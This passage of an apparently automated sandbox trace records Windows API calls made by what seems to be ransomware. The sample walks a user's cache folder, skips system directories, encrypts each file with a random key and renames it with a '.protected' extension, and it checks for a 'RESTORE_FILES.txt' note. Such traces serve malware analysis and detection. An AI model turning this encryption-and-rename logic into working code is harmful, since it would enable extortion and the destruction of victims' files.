lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1ae, lpOverlapped=0x0) returned 1 [0089.088] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.088] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.088] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.089] CloseHandle (hObject=0x150) returned 1 [0089.089] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.protected") returned 162 [0089.089] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450.protected")) returned 1 [0089.130] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.130] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="Windows") returned -1 [0089.130] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="Program Files") returned -1 [0089.130] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="Program Files (x86)") returned -1 [0089.130] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="$Recycle.bin") returned 1 [0089.130] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="System Volume Information") returned -1 [0089.130] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 152 [0089.130] StrStrIW (lpFirst="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpSrch=".protected") returned 0x0 [0089.130] lstrcmpW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="RESTORE_FILES.txt") returned -1 [0089.130] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.130] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 152 [0089.131] StrStrW (lpFirst="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpSrch=".txt") returned 0x0 [0089.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 152 [0089.131] StrStrW (lpFirst="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpSrch=".rar") returned 0x0 [0089.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 152 [0089.131] StrStrW (lpFirst="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpSrch=".zip") returned 0x0 [0089.131] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1ec, lpOverlapped=0x0) returned 1 [0089.132] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.132] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1ec, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1ec, lpOverlapped=0x0) returned 1 [0089.132] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.132] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.132] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.132] CloseHandle (hObject=0x150) returned 1 [0089.132] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.protected") returned 162 [0089.132] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001.protected")) returned 1 [0089.133] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.133] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="Windows") returned -1 [0089.133] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="Program Files") returned -1 [0089.133] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="Program Files (x86)") returned -1 [0089.133] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="$Recycle.bin") returned 1 [0089.133] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="System Volume Information") returned -1 [0089.133] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 152 [0089.133] StrStrIW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpSrch=".protected") returned 0x0 [0089.133] lstrcmpW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="RESTORE_FILES.txt") returned -1 [0089.133] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.133] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.133] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.134] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 152 [0089.134] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpSrch=".txt") returned 0x0 [0089.134] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 152 [0089.134] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpSrch=".rar") returned 0x0 [0089.134] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 152 [0089.134] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpSrch=".zip") returned 0x0 [0089.134] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1a0, lpOverlapped=0x0) returned 1 [0089.134] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.134] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1a0, lpOverlapped=0x0) returned 1 [0089.135] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.135] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.135] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.135] CloseHandle (hObject=0x150) returned 1 [0089.135] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.protected") returned 162 [0089.135] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852.protected")) returned 1 [0089.135] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.135] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="Windows") returned -1 [0089.135] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="Program Files") returned -1 [0089.135] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="Program Files (x86)") returned -1 [0089.136] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="$Recycle.bin") returned 1 [0089.136] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="System Volume Information") returned -1 [0089.136] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 152 [0089.136] StrStrIW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpSrch=".protected") returned 0x0 [0089.136] lstrcmpW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="RESTORE_FILES.txt") returned -1 [0089.136] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.136] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.136] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 152 [0089.136] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpSrch=".txt") returned 0x0 [0089.136] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 152 [0089.136] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpSrch=".rar") returned 0x0 [0089.136] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 152 [0089.136] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpSrch=".zip") returned 0x0 [0089.136] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1a0, lpOverlapped=0x0) returned 1 [0089.137] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.137] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1a0, lpOverlapped=0x0) returned 1 [0089.137] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.137] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.138] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.138] CloseHandle (hObject=0x150) returned 1 [0089.138] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.protected") returned 162 [0089.138] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8.protected")) returned 1 [0089.138] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.138] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="Windows") returned -1 [0089.138] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="Program Files") returned -1 [0089.138] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="Program Files (x86)") returned -1 [0089.138] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="$Recycle.bin") returned 1 [0089.138] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="System Volume Information") returned -1 [0089.138] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 152 [0089.139] StrStrIW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpSrch=".protected") returned 0x0 [0089.139] lstrcmpW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="RESTORE_FILES.txt") returned -1 [0089.139] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.139] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.139] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.139] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 152 [0089.139] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpSrch=".txt") returned 0x0 [0089.139] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 152 [0089.139] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpSrch=".rar") returned 0x0 [0089.139] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 152 [0089.139] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpSrch=".zip") returned 0x0 [0089.139] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x204, lpOverlapped=0x0) returned 1 [0089.169] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffdfc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.169] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x204, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x204, lpOverlapped=0x0) returned 1 [0089.170] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.170] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.170] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.170] CloseHandle (hObject=0x150) returned 1 [0089.170] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.protected") returned 162 